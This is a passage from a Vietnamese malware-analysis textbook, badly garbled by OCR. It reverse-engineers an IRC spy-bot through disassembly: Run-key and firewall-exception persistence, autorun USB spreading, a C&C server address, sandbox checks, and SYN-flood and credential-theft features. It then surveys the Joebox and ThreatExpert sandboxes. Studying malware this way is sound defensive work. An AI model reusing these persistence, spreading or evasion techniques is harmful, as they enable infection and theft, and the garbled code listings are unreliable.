* |. text: 0040282E push esi ; Source 

* |. text: 0040282F call GiaiMa 

* |. text: 00402834 ush eax 

* |. text: 00402835 ea eax, [ebp+CurrentDirectory] 

* |. text: 00402838 push eax 

* |. text: 0040283C call HideFile 

* |. text: 00402841 add esp, 20h 

* |. text: 00402844 test eax, eax 

* |. text: 00402846 d loc. 402A0C 

* |. text: 0040284C ea eax, [ebp+hKey] 

* |. text: 0040284F push ebx ; lpdwDisposition 
* |. text: 00402850 mov edi, ds: hả. 

* |. text: 00402856 push kim kResult 

* |. text: 00402857 push ebx A T oSacurityactributes 
* |. text: 00402858 push 0F003Fh ; samDesired 


Hình 4-49: Xuất hiện hàm giải mã dé lay khóa registry 
Hàm giải mã có dia chỉ: 4048f9 


marry bo EUED-UUU 
Ç S Fëzgoopon 
E X 
3 FF15 83584880 
BE CCB540n8 MOY EST, Doan 
Ee 
Eg E5z0gtgq 


= "Tskoonf, exe” 


der SBFEFFFF LER EAX, DWORD PTR 55: LEBP-1681 


E 
E 


8085. D4FAFFFF LEA EAX, DWORD PTR 35: [EBP-E2E] 
ë ECEëApon 


GA 
EE 50314888 
ES ÿEz00n 
LEA EAR DWORD PTR SS: LEBP-1681 


ADO ESP, 28 
TEST EAs, EAX 


G1 2FF 24 
BULZ FS Sa 
ðñ012FF2C| 04000 DEEG. 1 


Hình 4-50: Hàm giải mã có địa chỉ 4048f9 


Lần lượt check các hàm giải mã ta lay hết luôn các chuỗi cần giải mã: 
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Oe rf ^^". zë Si n Mare 


*|.data:0040B5cc ; char Tskconf_exe[} 


.data:0040B5cc Tskconf exe db "»êÉÿöòY+PâP",0 
*|.data:0040B5D8 ; char Tskconf[] i 
.data:0040B5D8 Tskconf db '»éEyoo¥' ,O 


. data: 0040B5D8 
*|.data:0040B5EO ; char windir. [] 


.data: 0040B5EO windir.. db 'iisofseé!',0 
.data: 0040B5E9 align 4 

.data: 0040B5EC ; char MSN[] 

.data: 0040B5EC MSN db '«i6o0-«',0 

. data: 0040B5EC 

. data: 0040B5F2 align 4 
.data:0040B5F4 ; char crack exe[] » 
.data:0040B5F4 crack. exe db '«eUyÉ«PàP',0 
.data: 0040B5FE align 10h 


.data: 00408600 ; char usb. driver. com[] 

.data:0040B8600 usb driver com db ae Ae Pé+yoa' ,0 
. data: 0040B60F align 10h 

. data: 00408610 new. gOv. me db 'oPi«f-i«üP',0 


Hinh 4- 51: Kiém tra hàm gia má dé lay chuói can giai mà 


Dung chuói vira giai mà duoc là filename: 


. TEXT: UU4UZ85UZ pusn eax ; Ipsrc 
.text:00402803 call ds :ExpandEnvironmentStringsA 

. text: 00402809 mov esi, offset Tskconf exe ; “»êÉÿöòY+PâP” 
.text:0040280E push esi ; Source 
.text:0040280F call GiaiMa 

.text:00402814 push eax 

.text:00402815 lea eax, [ebp+CurrentDirectory] 
.text:0040281B push eax 

. text: 0040281C lea eax, [ebp+ApplicationName] 

. text: 00402822 push offset aSS ; "Zeie 

. text: 00402827 push eax ; Dest 

. text: 00402828 call ds:sprintf 

. text: 0040282E push esi ; Source 
.text:0040282F call GiaiMa 

.text:00402834 push eax 

.text:00402835 lea eax, [ebp+CurrentDirectory] 

. text: 0040283B push eax 

. text: 0040283C call HideFile 

. text: 00402841 add esp, 20h 

. text: 00402844 test eax, eax 

. text: 00402846 jz loc 402A0c 

.text:0040284C lea eax, [ebp+hKey] 

.text:0040284F push ebx ; lpdwDisposition 
.text:00402850 mov edi, ds:RegCreateKeyExA 
.text:00402856 push eax ; phkResult 
.text:00402857 push ebx ; lpsecurityAttributes 
.text:00402858 push 0F003Fh ¡ samDesired 

. text: 0040285D push ebx ; dwOptions 
.text:0040285E push ebx ; lpClass 
.text:0040285F push ebx ; Reserved 
.text:00402860 push offset SubKey ; "SOFTWARENM i crosoftNNWindowsNNCurrentVersi"... 
.text:00402865 push 80000002h ; hKey 
.text:0040286A mov [ebp+hKey], ebx 

.text:0040286D call edi ; RegCreateKeyExA 
.text:0040286F ush esi ; Source 
.text:00402870 all GiaiMa 


Hinh 4-52: Giải mã tên file dùng tên dáng kí Registry 
Tiến hành tạo Path file dùng cho các hàm Hide File (dùng Api 
SetFileAttributesA) địa chi 403CC2. 
Dáng ky khóa registry dé chuong trinh tu khói dóng. 
Đăng ky khóa registry dé thêm malware vào danh sách của tường lửa 
window. 


Vói các khóa Registry = filename tai các path sau: 
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temCurrentc| | 
entc db "SYSTEM\CurrentContro]Set`\Serv1ces`\SharedAccess\Parameters`\F1rewal ' 
: DATA XREF: WinMain(x,x,x,x)+223fo 
db '1Policy\StandardProfile\AuthorizedApplications\List' ,0 
align 4 
abledS[] 
db '%s:*:Enabled:%s',0 ; DATA XREF: WinMain(x,x,x,x)«1FBfo 
twareMicr. OI 
cr. O0 db 'SOFTWAREWicrosoftWindows NT\CurrentVersion\Terminal Server\Inst' 
; DATA XREF: WinMain(x,x,x,x)+190To 
; RemoveRegistry+5/To 
db 'all\Software\Microsoft\Windows\CurrentVersion\Run\' ,0 


db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\' ,0 
; DATA XREF: W1inMain(x,x,x,x)+13B†o 


1 


align 4 
Hình 4-53: Các đường dẫn 
Tao Thread mới tự động copy file: 


CODE XREF: IntectDrive+0/Jj 


H 
3 InfectDrive+D4 jj 
push 2EEOh ; dwMilliseconds 
call ds:Sleep 
lea eax, [ebp+suffer] 
push eax ; lpBuffer 
push 201h ; nBufferLength 
call ds:GetLogicalDriveStringsA 
test eax, eax 
jz short loc 405B0A 
lea esi, [ebp+Buffer] 
; CODE XREF: TnfectDrive+D2L1 
mov al [esi] 
cmp al, 41h 
mov byte ptr [ebp+String2], al 
da short loc 405BS8B 
cmp al, 42h 
jz short loc. 405B8B 
cmp al, 
jz short loc 405B8B 
cmp al, 
jz short loc 405BS8B 
lea eax, [ebp+String2] 
push eax ; lpRootPathName 
call ds:GetDriveTypeA 
cmp eax, 
jnz short loc 405B8B 
lea sax; [ebp+String2] 
push 5 Ipstring2 
call Sub _40583F 
test eax, eax 
pop ecx 
jz short loc_405B8B 
lea eax, [ebp+String2] 
push eax 
push offset aDVlzBOt ; "[DvLz- Bot]: 
push offset aslnf3ct3dDrlv3 ; "%s inf3ct3d Drlv3: %s" 
push offset MSN s "4 1604" 
call GiaiMa 
pop ecx 
push eax ; int 
push [ebp+var_ BC] ; int 
call SendActive | 
add esp, 14h 


Hinh 4-54: Lay tén 6 dia và kiéu 6 dia 
Dùng các API GetLogicalDriveStringA lấy tên 6 dia, GetDriveTypeA 
lay kiéu 6 dia. 
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lea eax, [ebp+ExistingFileName] 


push eax ; lpExistingFileName 
call ds:CopyFileA 
mov [ebp-var 4], eax 
lea eax, [ebp+PathName] 
push 7 ; dwFileAttributes 
push eax ; lpFileName 
call ebx ; SetFileAttributesA 
mov ecx, 
xor eax, eax 
lea edi, [ebp«ExistingFileName] 
cmp [ebp+PathName], 5Ch 
rep stosd 
stosw 
lea edi, [ebp+PathName] 
jz short loc_4059EE 
; CODE XREF: Infect+1lAD]j 
inc edi 
cmp byte ptr [edi], 5ch 


jnz short loc 4059E8 


; CODE XREF: Infect«lA71j 


lea eax, [ebp«ExistingFileName] 

push offset aAutorunOpen ; “[autorun]\r\nopens=" 
push eax ; lpstringl 

inc edi 

call esi ; lstrcatA 

lea eax, [ebp«ExistingF ileName] 

push edi ; IpString2 

push eax ; lpstringl 

call esi ; lstrcatA 

lea eax, [ebp«ExistingFileName] 

push offset aActionOpenShel ; “\r\naction=Open\r\nshel1\\open=Open\r\nshell\\o"... 
push eax ; IpStringl 

call | esi ; IstrcatA 


laa aav TahniEvictinatilaNa3mal 


Hinh 4-55: Copy file virus tao mói các file 
Düng các API CopyFileA copy file virus sang, tao mói các file 


desktop.ini, autorun.inf dáng ky các khóa autorun. 


Ica TAA H Levprrac HYGHIC J 

push eax ; lpStringl 

call esi ; lstrcatA 

lea eax, [ebp+PathName] 

push offset aAutorun inf ; “\\autorun.inf” 
push eax ; lpStringl 

call esi ; lstrcatA 

lea eax, [ebp+PathName] 

push 80h ; dwFileAttributes 
push eax ; lpFileName 

call ebx ; SetFileAttributesA 

xor esi, esi 

lea eax, [ebp+PathName ] 

push esi ; hTemplateFile 

push ; dwFlagsAndAttributes 
push 2 ; dwCreationDisposition 
push esi ; lpSecurityAttributes 
push esi ; dwShareMode 

push 40000000h ; dwDesiredAccess 

push eax ; lpFileName 

call ds:CreateFileA 

mov edi, eax 


Hinh 4-56: Tao file autorun 
Tiép theo là tao Thread vói hàm hoat dóng chính cua Bot: 
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liệu. 


; CODE XREF: WinMain(x,x,x,x)4+121Tj 


3 
eax, [ebp+ThreadTd] 
esi, ds:CreateThread 
eax ; lpThreadrd 
eax, [ebp+Parameter ] 
ebx ; dwCreationF lags 
eax ; lpParameter 
offset InfectDrive ; lpStartAddress 
ebx ; dwStackSize 
ebx ; IpThreadAttributes 
[ebp+Parameter], offset unk 40D280 
esi ; CreateThread 
eax, [ebp+ThreadTd] 
eax ; lprhreadId 
ebx ; dwCreationFlags 
ebx ; lpParameter 
offset MainBot ; lpStartAddress 
ebx ; dwStackSize 
ebx ; IpThreadAttributes 
esi ; CreateThread 
esi, eax 
esi, ebx 
short loc 402A52 
OFFFFFFFFh ; dwMilliseconds 
esi ; hHandle 
ds:waitForSingleObject 
esi ; hobject 
edi ; CloseHandle 


Hinh 4-57: Tao thread và các hoat dóng chính 


Tao mutexname: 4y6t8mUtll dé tránh viéc tao các thread xung dot dt 


pai 
mov 
push 
xor 
xor 
mov 


push 
push 
push 
call 
cmp 
mov 
jnz 
push 
call 
inc 
cmp 
jl 


push 
push 
push 
push 
call 
push 
call 
cmp 

jnz 

scanner La 


esi, ds :CreateMutexA 
ebx, ebx 
ebp 
edi, offset Name ; "Zy6tSmUtcl'" 


; CODE XREF: MainBot+36L1 
edi ; lpName 
ebx ; bInitialOwner 
ebx ; lpMutexAttributes 
esi ; CreateMutexA 
eax, ebx | 
hMutex, eax 
short loc_402A93 
1388h ; dwMilliseconds 


ebp, 6 
short loc 402A74 


CODE XREF: MainBot+25Tj 


, 
7530h ; dwMilliseconds 
edi ; lpName 
x ; bInitialOwner 
ebx ; lpMutexAttributes 
esi ; CreateMutexA 
eax ; hHandle 
ds:waitForSingleObject 
eax, 102h 


short loc. 402AB3 


aruit dn 


Hinh 4-58 Tao mutexname 4y6t8mUt11 
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Tao connect tới C&C server: new. gv me 


HU Vv CLA, Cl 

call sub_403783 

push eax : dnt 
push 7 

push 4 

mov ecx, esi 

call sub. 403783 

push eax ; Source 
lea eax, new gÜv me[edi] ; "oPi«f-3i«üP" 
push dword 40B/20[edi] ; int 
push eax ; Source 
call GiaiMa 

pop ecx 

push eax : ant 
mov ecx, esi ; int 
call CreatConect 


Hình 4-59: Tao conect tới C&C server 
Hàm CreateCOnect: düng các socket API 


pusti CUA ; —UWURKRL 
push 2 ; _DWORD 
call socket 0 

cmp eax, OFFFFFFFFh 

mov [esi], eax 

jz short loc_403146 

push [ebp+arg_0] 

call gethostbyname 

test eax, eax 

jz short loc_40313E 

mov eax, [eax+0Ch] 

push 4 ; Size 
push dword ptr [eax] ; Src 
lea eax, [ebp+Dst] 

push eax ; Dst 
call memcpy 

add esp, Och 

mov word ptr [ebp+var_10], 2 
push [ebp+arg_4] 

call htons 

mov word ptr [ebp+var_10+2], ax 
lea eax, [ebp+var_ 10] 

push 10h ; _DWORD 
push eax ; _DWORD 
push dword ptr [esi] ; _DWORD 
call conect 

cmp eax, OFFFFFFFFh 

jnz short loc_40314D 


Hình 4-60: Dùng các socket API 


May chủ điều khiển bot đã ngừng hoạt động, Bot trao đôi với máy chủ 
qua giao thức IRC dung socket. 
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text: UU4U505B 

text: 0040863B push esi 

text: 0040863C mov esi, [esp+4+arg 0] 
text: 00408640 push edi 

text: 00408641 push offset sub_408CFA ; H int 
text: 00408646 push offset aError_0 ; "ERROR" 
text: 0040864B mov ecx, esi 

text: 0040864D call sub_402E9E 

text: 00408652 push offset sub_4080D1 ; int 
text: 00408657 push offset aPrivmsg ; "PRIVMS 
text:0040865C mov ecx, esi 

text:0040865E call sub. 402E9E 
text:00408663 push offset sub 40830F ; int 
text:00408668 push offset aKick ; "KICK" 
text:0040866D mov ecx, esi 

text:0040866F call sub. 402E9E 
text:00408674 mov edi, offset sub. 4083DD 
text:00408679 mov ecx, esi 

text:0040867B push edi ; int 
text: 0040867C push offset aTopic_0 ; "TOPIC" 
text:00408681 call sub. 402E9E 
text:00408686 push edi ; int 
text:00408687 push offset a332 ; 1432" 
text: 0040868C mov ecx, esi 

text: 0040868E call sub_402E9E 

text: 00408693 push offset sub_408607 ; int 
text: 00408698 push offset a366 ; "366" 
text: 0040869D mov ecx, esi 

text: 0040869F call sub_402E9E 

text: 004086A4 mov edi, offset sub_40856A 
text: 004086A9 mov ecx, esi 

text: 004086AB push edi ; int 
text: 004086AC push offset a005 ; "005" 
text: 004086B1 caT] sub_402E9E 

text: 004086B6 push edi ; int 
text: 004086B7 push offset a376 s TH. 
text: 004086BC mov ecx, esi 

text: 004086BE call sub_402E9E 

text: 004086C 3 push edi ; int 
text: 004086C4 push offset a422 ; "422" 
text: 004086C9 mov ecx, esi 

text: 004086cB call sub_402E9E 

text: 00408600 push offset sub_408621 ; int 
text: 004086D5 push offset a433 : EEN 


Hình 4-61: Case Function với các lệnh cua IRC như KICK,PRIVMSG ... 
Các chức năng chính cua Bot ma ta tim được: 
Tu huy delete Registry key. 


Tu tao cac file.bat remove cac file. 
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push ottset aSottwareMicr 1 ; Sottware\\Microsotrt\ 


push 80000002h ; hKey 

call edi ; RegCreateKeyExA 

push offset Tskconf ; "»éÉyóoY" 
call GiaiMa 

mov ebx, ds:RegDeleteValueA 

pop ecx 

push eax ; lpvalueName 
push [ebp+hKey] ; hKey 

call ebx ; RegDeleteValueA 

push [ebp+hKey] ; hKey 

call ds :RegC loseKey 

lea eax, [Lebp+hKey] 

push esi ; lpdwDisposition 
push eax ; phkResult 
push esi ; lpSecurityAttributes 
push 0F003Fh ; samDesired 
push es1 ; dwOptions 
push esi ; lpClass 
push esi ; Reserved 
push offset aSoftwareMicr DU ; “SOFTWARE\\Microsoft\\Windows NT 
push 80000002h ; hKey 

call edi ; RegCreateKeyExA 

push offset Tskconf ; "»éÉyooY" 
call GiaiMa 

pop ecx 

push eax ; lpValueName 
push [ebp+hKey] ; hKey 

call ebx ; RegDeleteValueA 

push [ebp+hKey] ; hKey 

call ds:RegCloseKey 

push hMutex ; hMutex 

call ds:ReleaseMutex 

cmp [ebp«-arg 0], esi 

jnz short loc 404127 

call cuh AQR7nA 


Hình 4-62: Tìm được chức năng tự hủy — hủy các registry key. 
Download các file tự cập nhật, Function có địa chỉ 404FE6. 
Lay lan file crack.exe vào tat cả các file. Rar địa chỉ 405FB7. 


seTLurrentvUIrectoryaAl .. J; 


else 


if ( GetFullPathNameA(FindFileData.cFileName, Oxl04u, &string, &F1lePart) ) 


CharLowerA(&String); 
và = |strlenA(&string); 
if ( !memcmp(&v3[v2], "rar", 3u) ) 


Sleep (0x1388u) ; 
sub_406032(&v6, 7, 1); 


>\\Curren 


\\cur! 


sub 405C39(&string, NumberOfBytesWritten, "+éUye+PaP", 128);// +éUyE+PaP = crack. exe 


Hinh 4-63 Lay lan file crack.exe 


Spam email(send file zip dé lây lân),Spam lay thông tin các loại tài 
khoản yahoo, MSN, Skype dia chi 4060a5. Da số sử dụng kỹ thuật dùng 


ham API keybd_event để gửi các phím. 


Đưa file lây lan vào mạng P2P torrent 
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pop ecx 


push offset aDvlzTrltOün 


Jor 402279; ; CODE XREF: CaseChucNang» 330t j 
aseChucNangs 6221 j , 


SÉ 
push offset asThr34dD1s4b13 


40227E jmp short loc_402202 


102280 loc 402280: ; CODE XREF: CaseChucNang«7DBT j 
102280 push dword ptr [esi] ; lpString2 

102282 push offset aP2p 

102287 call edi Istrempia 

402289 test eax, eax 

102288 jnz short loc 40229c 


402280 ` - call sub 407803 
402292 push offset aDv]zP2pF1131nj 


402297 jmp loc_401E66 | 


Hình 4-64: Đưa file lây lan vào mạng P2P 

Ngoài ra còn các chức năng như: Dùng kiểu tan công syn flood một 
máy nào đó, và tìm giải mã hệ thống lưu trữ bảo vệ Pstore của windows. 
Dùng các hàm API tại Pstore.dll dé lay và giải mã các dit liệu. 

Trên đây đã phân tích các kỹ thuật của file chính là rewrite process 
thành một con mới là một botnet IRC. 

4.6 Viết báo cáo với mẫu vừa phân tích. 

I. CONF4.exe 
SHA256:1c09b262b940d22c7f0b6956aee0949a640db66616bf70e4cdf6b 
le7eae06828 
SHAI: fd24495048ce85e39174b0f9f6fc5597137b84d5 
MDS: ceea769e2b3dfc45ce8f0075541a5939 
File size: 112.7 KB( 115376 bytes) 
File name: conf4.exe 
File type: Win32EXE 
Code bang Borland Delphi( 2.0-7.0) và VisualC++ 6.0 
II. Thông tin chung 

- File là một Spy Bot Net đã bị 22/44 trình diệt virus phat hiện theo 
virus total xac dinh. 
III. Các hoạt động cu thể. 

Kiểm tra các chương trình thực hiện việc phân tích như wireshark,... và 


hàm kiêm tra sanbox, vmware... 
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= 9-9 n 


text 
„text 
.text 
.text 
text 
text 
„text 
text 
.text 
.text 
text 


~x Ty mm 


:004049c 3 
:004049c6 
:004049c7 
:004049c8 
:004049c£ 
:00404905 
:004049p6 
:004049pp 
:004049E4 
:004049£8 
:004049F 2 


lea eax, [ebp+pcbBuffer] 
edi 


push 

ush eax ; pcbBuffer 

ea eax, [ebpsStr] 

mov [ebp«var 14], offset aSandbox ; "sandbox" 
push eax ; lpBuffer 
mov [ebpe«var 10], offset aHoney ; "honey 
mov [ebp«var C], offset aVmware ` "vmware 
mov [ebpevar 8], offset aCurrentuser currentuse 


mov [ebp+pcb8uffer], §0h 
call ds:GetUserNameA 


Hinh 4-65: Kiém tra mói truóng phán tích 


Thuc hién viéc dáng kí, tao thread tu dóng copy file, düng các API 


CopyFileA copy file virus sang, tao mói các file desktop.ini dáng kí các 


khóa autorun: 


push 
call 
lea 

push 
push 
call 
lea 

push 
push 
call 
xor 

lea 

push 
push 
push 
push 
push 
push 
push 
call 
mov 


Ca^, |[cuptracrmamc y 

eax ; lpstringl 

esi ; lstrcatA 

eax, [ebp«PathName] 

offset aAutorun inf ; "\\autorun, inf" 
eax ; IpStringl 

esi ; lstrcatA 

eax, [ebp«PathName] 
80h ; dwFileAttributes 


eax ; l|pFileName 

ebx ; SetFileAttributesA 

esi, esi 

eax, [ebp+PathName] 

esi ; hTemplateFile 

7 ; dwFlagsAndAttributes 
2 ; dwCreationDisposition 
esi ; lpSecurityAttributes 
esi ; dwShareMode 
40000000h ; dwDesiredAccess 

eax ; lpFileName 
ds:CreateFileA 

edi, eax 


Hinh 4-66: Tao autorun 


Tao các thread vói hàm chính cüa Bot, dé duy tri nhận lệnh bot từ xa từ 


C&C server: New.gov.me. 


Các chức năng của Bot tim thay: 


- Tu hüy 


- Xóa Registry key 


- Tu tao file.bat remove các file 


- Download các file tu cáp nhat 


- Lay lan file crack.exe vào tat ca các file. rar trén máy. 
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peti.urrentvirectoryAl .. J; 


else 
if C GetFullPathNameA(FindFileData.cFileName, 0x104u, &string, &FilePart) ) 
CharLowerA(&String); 
2 = IstrlenA(&String); 


if C !memcmpC&v3[v?], ^ rar", 3u) ) 
Sleep(0x1388u); 


SERA eege Ee, dati salad drin 
Hinh 4-67 Lay lan file crack vào cacsi file .rar 
- Spam email ( gửi file zip ), Spam lay thông tin các loại tài khoản 
yahoo, MSN, Spype 
- Dua file lày nhiém vào mang P2P torrent 


UZ ZOVU 

402280 

402280 

402280 loc 402280: ; CODE XREF: CaseChucNang+/DBTj 
402280 push dword ptr [esi] ; IpString2 

102282 push offset aP2p 

102287 call edi 1strcmpiA 

402289 test eax, eax 


Hình 4-68 Lay nhiễm vào mang P2P torrent 
- Tan công Dos các mục tiêu chỉ định ( syn flood) 


- Tìm giả mã hệ thông bảo vệ Pstore của Windows 


4.6 Câu hỏi và bài tập 


176 


Chuong 5 
CAC KY THUAT PHAN TÍCH DONG 
Phân tích động là một trong nhiều phương pháp sử dung dé phân tích 
mã độc hại. 
5.1 Kỹ thuật phân tích động sử dung Sandbox 
Việc xây dựng hệ thống tự động phân tích mã độc hại thì đã có rất 
nhiều hãng trên thế giới đã thực hiện, họ cũng sử dụng có rất nhiều công 


nghệ khác nhau. Có thé kế đến các hãng như : 


Threat Expert : www.threatexpert.com 

Anubis http://analysis.seclab.tuwien.ac.at/ 

CWSandbox http://research.sunbelt-software.com/ViewMalware.aspx 

Norman Sandbox http://www.norman.com/microsites/nsic/en-us 

Joebox http://www.joebox.com 

Tuy nhiên thường các hãng thi không nói rõ cách thức tao hệ thống tự 
động phân tích mã độc hại và phương pháp dé phân tích chi tiết rõ rang 
như thé nao. Mà thường chỉ cho cho người phân tích gửi mẫu lên và sau 
một thời gian nhận kết quả qua email về. 

Chỉ có hãng Joebox nêu đặc điểm cách xây dựng và những cách 
họ áp dụng, về thé phan tiếp sau đây sẽ mô tả quá trình phát triển hệ 
thống tự động phân tích mã độc hại của họ qua từng phiên bản. 

5.1.1 Công nghệ Sanbox của Joebox 
5.1.1.1 Giới thiệu hãng Joebox 

Joe Security là một tô chức được điều hành bởi Stefan Buehlmann 
BSc FHNW người hiện giờ đang theo đuôi bằng Master ở It-Security tại 
Security Engineering Lab tại khoa Engineering and Information 
Technology cua trường Bern University of Applied Sciences, 
Switzerland. Anh có sở thích đăc biệt với các chương trinh mức thấp, 
mạng máy tính và các hệ thống phân tán, thiết kế hệ điều hành và các 
ứng dụng bảo mật. Anh ta là người đứng đầu JoeSecurity. 

Mục đích của họ là thực thi một hệ thống phân tán cỡ lớn, cơ sở 
hạ tang dé thu thập, phân tích, đánh giá và chóng lại mã độc hại trên môi 


trường Windows. 
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Thanh vién trong JoeSecurity kha ft ngoai Stephan chi co thém 
Christopher Liebchen là một sinh viên từ Đức hiện giờ nghiên cứu về tin 
học tại trường Darmstadt. Đây là 1 người cũng rất thích nghiên cứu mã 
độc hại và các chương trình cấp thấp và dịch ngược. 
5.1.1.2 Giới thiệu về công nghệ Sandbox Joebox sử dụng 

Sandbox là một hệ thống tự động tìm kiếm và ghi lại hoạt động 
của mã độc hại. Ứng dụng Sandbox này được trong suốt với mã độc hại. 
Các log file được sử dụng phân tích và biết được hành vi mã độc hại và 
từ đó nam được những hành vi xấu lên hệ thống từ đó có thể xây dựng 
chương trình xóa mã độc hại. 

Thường thi sandbox được xây dựng bang máy ảo. Tuy nhiên hiện 
giờ rất nhiều mã độc hại có nhiều phương pháp dò tìm ra việc này. Kết 
quả là hacker sử dụng nhiều kỹ thuật để chặn đứng việc nghiên cứu hoặc 
làm chậm việc phân tích mã độc hại mới nếu như người phân tích sử 
dụng môi trường máy ảo. 

Chính vì thế hãng Joe Security đã sử dung một hệ thống thực 
thành vì giả lập các phần mềm. Họ thiết kế những phần cứng đặc biệt. 

Việc phân tích được chú trọng đầu tiên vào windows XP và 
windows Vista. 
5.1.1.3 Thiết kế hệ thong Sandbox của hang Joebox 

Joebox application sử dung một may tinh thật dé phân tích mã độc 


hại. Phần mềm này được thể hiện dưới 4 phần dưới đây. 


Hinh 5-1: Thiết kế tông thé Sandbox — JoeBox 


Joebox InJectior chịu trách nhiệm đưa vào mã độc hại cân phân 


tích vào phần xử lý. Và bản thân Joebox Injector cũng kết nối với Joebox 


sniffer. 
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Joeboxhooker là một thư viện liên kết động hooks va ghi lại các 
ham API. Joeboxsniffer thực thi việc bắt các gói tin dựa vào thư viện 
WinPcap. 

Joeboxrestore là dé khôi phuc lai hé diéu hanh sau khi phan tich. 

3 Phan của hệ thống được thé hiện dưới đây như sau : 

Sandbox Controller, Sniffer 


Harddisk 1 Harddisk 1 X 
(Vista) i (Win XP) 


Harddisk 2 


(Vista) 


Optical restore 
device (DVD) 


Hinh 5-2 Thiét ké chi tiét Sandbox- Joebox 

May sandbox chứa 2 harddisks đều cài Windows Vista và một 6 
đĩa quang. Cỗ máy điều khiển thì hướng dẫn cho ứng dụng 
Joeboxinjector thực thi mã độc hại và inject Joeboxhooker vào trong để 
khởi động quá trình. Máy controller có thể ghi log toàn bộ traffic giữa 
internet va sandbox network. 

Kỹ thuật hooking va logging 

Joebox sử dung kỹ thuật detour API hooking hay còn gọi là kỹ 
thuật hook inline. Kỹ thuật này sẽ chèn vào đầu ham API cần hook 1 
lệnh JMP, lệnh này sẽ nhảy đến (jump) đoạn code xử lý của người lập 
trình. Có thể hình dung thế này, khi mã độc hại gọi đến một hàm API 
của hệ thống — hàm này ta đã hook thì đầu hàm nó sẽ JMP đoạn code xử 
ly của ta, và ta sẽ lay các tham số của hàm ra từ stack và xử lý (sửa tham 
số hay ghi log tùy ý định của ta). 

Sau đó mình sẽ khôi phục lại 5 byte gốc của hàm API đó và nhảy 
lại về đầu hàm API đó và cho thực hiện hàm như bình thường. 
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Process space 


| logfile 


joeboxinjector 


application 
data 


Hình 5-3: Kỹ thuật hooking and logging 

Quá trình khôi phục hệ thống. 

Sau khi malware được phân tích, hệ thống sẽ được quay trở lại 
trạng thái cũ lúc ban đầu. Có nhiều giải pháp phần cứng dé khôi phục 
một hệ thống sau khi khởi động lại — gọi là hd protector hay hd guader. 
Joebox sử dụng một hệ thống khôi phục trạng thái, như đã trình bảy ở 
trên có 2 hardisk với 2 hệ điều hành được cài đặt. Để khôi phục lại hệ 
điều hành ban đã Joebox sẽ khởi động từ một hệ thống này tớ hệ thong 


khác và ghi đè lại hệ thống cũ bằng một DVD-rom hay network device. 


Tư) 


Hình 5-4: Quy trình khôi phục lại hệ thống 
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Tổng kết Joebox là một công cu cần thiết dé phân tích tự động 
hành vi của malware trên hệ điều hành Windows Vista. Thiết kế dạng 
module log sinh ra là dang XML, ngoài ra nhiều output dạng khác nữa. 
Joebox được viết bằng C++. 

Ưu điểm : 


Dễ dàng thực thi. 

Các tham số các ham API và giá trị các ham trả về ta đều dé dàng có 
được dé phân tích. 

Thời gian trả về kết quả là khá nhanh (khoảng 2 đến 3 phút) 

API tự động hóa phân tích. 

Nó cung cấp nơi để mọi người chia sẻ về mã độc hại. 


Nhược điểm của phương pháp này : 


Rất dễ bị các malware dò tìm được cách can thiệp vào hàm API này 

nên dê bị malware dùng kỹ thuật chông lại chuyện bị phân tích. 

Có nhiêu driver linh hoạt không bị chặn và phân tích được. 

Một sô tiện ích người dùng phải trả phí. 

Chỉ phân tích trên môi trường Windows. 
5.1.2 Công nghệ Sandbox của Threatexpert 
5.1.2.1 Giới thiệu hang Threatexpert 
ThreatExpert là một hệ thống phân tích mối đe dọa tự động tiên tién 
duoc thiét ké dé phan tích va báo cáo hành vi cua virus máy tính, sâu, 
trojan, adware, spyware, và các rủi ro liên quan đến bảo mật khác trong 
một chế độ hoàn toàn tự động chỉ trong vài phút ThreatExpert có thể xử 
lý mẫu và tạo ra một mối đe dọa báo cáo rất chi tiết với mức độ chỉ tiết 
kỹ thuật phù hợp hoặc vượt quá tiêu chuẩn công nghiệp chống virus 
chăng hạn như những người bình thường tìm thấy trong bách khoa toàn 
thư virus trực tuyến. 
5.1.2.1 Hệ thống của Threatexpert 

Van dé 


Một mối de doa mới không được phát hiển bởi các phần mềm diệt virus 
tan công vào hệ thống của người dùng. 
Người dùng gửi mẫu virus đó đến nơi cung cấp phần mềm diệt virus đó 
dé phân tích. 
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- Có thé phải mat nhiều giờ cho những cung cấp phần mèm diệt virus đó 
để đưa ra giải quyết 

- Dap ứng 1 : Người cung cấp cập nhật các sản phẩm Antivirus (Người 
hỗ trợ). 

- Dap ứng 2 (tùy chọn): người cung cấp cung cấp cho các khách hàng 
với các mô tả về mối mối đe dọa. 


Antivirus n. 
Product —— Internet 4. 


Customer |" » 3 Antivirus 
| f| Vendor 


Hình 5-5: Người dùng gửi yêu cau tới nơi cung cấp phan mèm diệt virus 


Giải pháp 


- Nguoi sử dung gửi mẫu tới ThreatExpert. `. 

- ThreatExpert cung cáp một phân tích mô tả chi tiét môi đe doa ngay lập 
tức. 

- M6 tả mối de dọa có thê được sử dụng bởi khách hàng dé thực hiện giai 
doan giám thiéu mói de doa ( nhu tu dong hoac bang tay loại bỏ mối de 
dọa hoặc phòng) trước khi người cung cấp phần mềm diệt virus đáp 
ứng. 


Threat Expert E 
Automation Antivirus Yn 
Product — Internet 4 


if 


Antivirus 
Cl vendor 


Hinh 5-6: Người dùng gửi mẫu tới TheatExpert 


- Ngay như những người hỗ trợ nhận được một mẫu từ các khách hàng, 
tham gia ThreatExpert, ThreatExpert cung cấp một phản ứng đe dọa mô 
tả ngay lập tức. 

- Mô tả mối de dọa mới có thé được ngay lập tức được đăng trên trang 
web của công ty của các nhà cung câp, trước khi các nhà cung câp 
khác có khả năng làm như vậy. 
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Khách hang khác của nhà cung cấp có thé được ngay lập tức cảnh báo 
về một mối đe dọa mới với mô tả day đủ mói de dọa. 

Nhà cung cấp có thé sử dung các báo cáo chi tiết hành vi hỗ trợ trong 
phân tích phân mềm độc hại để giúp phát hiện ra phần mềm độc hại. 


Antivirus 


Product Internet 4 


Customer Antivirus 


Vendor 


Threat Expert. 
Automation 


Hinh 5-7: ThreatExpet trá vé két quà 

Uu diém: 

ThreatExpert là mót hé thóng phán tích mói de doa tu dóng tién 
tién duoc thiét ké dé phan tích và báo cáo hành vi cüa virus máy tính, 
sáu, trojan, adware, spyware, và các rüi ro lién quan dén bao mát mót 
cách hoàn toàn tự động chi trong vài phút ThreatExpert có thé xử ly 
mau và tao ra mót mói de doa báo cáo rat chi tiét vói mirc dó chi tiét ky 
thuật phù hợp hoặc vượt tiêu chuẩn chống virus cũng như việc mọi 
người tim được thóngng tin về virus trên mạng. 

Nhược điểm: 

Miễn phí, dịch vụ. 

